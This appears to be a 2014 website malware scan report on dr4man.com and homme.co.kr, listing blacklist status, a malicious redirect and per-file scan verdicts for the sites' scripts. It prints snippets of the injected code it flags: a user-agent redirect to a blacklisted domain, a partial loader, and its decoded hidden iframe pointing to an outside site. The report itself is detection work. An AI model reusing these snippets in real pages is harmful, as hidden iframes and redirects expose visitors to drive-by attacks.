Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dr4man.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
| Request | Server response | Status |
|---|---|---|
| URL: http://best100dealers.com.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: best100dealers.com.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 27 Sep 2014 16:04:31 GMT Location: http://gen.xyz/availability-checker.php?src=best100dealers.com.com Server: nginx/1.4.6 (Ubuntu) Content-Type: text/html X-Powered-By: PHP/5.5.9-1ubuntu4.4 | malicious |
Scanned pages/files
| Request | Server response | Status |
|---|---|---|
| http://dr4man.com/ | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:19 GMT Content-Length: 2292 | malicious |
| http://homme.co.kr/ | 200 OK Content-Length: 41821 Content-Type: text/html | suspicious |
| Page code contains blacklisted domain: m.dr4nose.com `<script type="text/javascript"> var mobileKeyWords = new Array('iPhone', 'iPod', 'BlackBerry', 'Android', 'Windows CE', 'LG', 'MOT', 'SAMSUNG', 'SonyEricsson'); for (var word in mobileKeyWords){ if (navigator.userAgent.match(mobileKeyWords[word]) != null){ location.href = "http://m.dr4nose.com"; break; } } </script> <script type="text/javascript" src="http://wcs.naver.net/wcslog.js"></script> <script type="text/javascript"> if(!wcs_add) var wcs_add = {}; wcs_add["wa"] = "6069f9d0b556b4"; wcs_do(); </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccoun` ...[4074 bytes skipped]... | | |
| http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16651 Content-Type: application/javascript | clean |
| http://dr4man.com/js/normal.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:27 GMT Content-Length: 2331 | malicious |
| http://homme.co.kr/js/normal.js | 200 OK Content-Length: 1927 Content-Type: application/x-javascript | malicious |
| Malicious code - confirmed by antiviruses (see below) `function getXMLHttpRequest() { if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch(e1) { return null; } } } else if (window.XMLHttpReques` Decoded script: `<iframe src=http://mirclinic.com/amzone/index.html width=100 height=0></iframe>` Antivirus reports: | | |
| http://dr4man.com/js/jquery.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:31 GMT Content-Length: 2331 | malicious |
| http://homme.co.kr/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
| http://dr4man.com/js/jquery.easing.1.3.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:35 GMT Content-Length: 2364 | malicious |
| http://homme.co.kr/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
| http://dr4man.com/js/mainImgSlide.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:38 GMT Content-Length: 2349 | malicious |
| http://homme.co.kr/js/mainimgslide.js | 200 OK Content-Length: 2961 Content-Type: application/x-javascript | clean |
| http://dr4man.com/js/smsBanMove.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:40 GMT Content-Length: 2343 | malicious |
| http://homme.co.kr/js/smsbanmove.js | 200 OK Content-Length: 828 Content-Type: application/x-javascript | clean |
| http://dr4man.com/js/flashObject.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:41 GMT Content-Length: 2346 | malicious |
| http://homme.co.kr/js/flashobject.js | 200 OK Content-Length: 1099 Content-Type: application/x-javascript | clean |
| http://dr4man.com/js/topMenuFlash.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:43 GMT Content-Length: 2349 | malicious |
| http://homme.co.kr/js/topmenuflash.js | 200 OK Content-Length: 181 Content-Type: application/x-javascript | clean |
| http://dr4man.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:44 GMT Content-Length: 2436 | malicious |
| http://homme.co.kr//www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
| http://homme.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |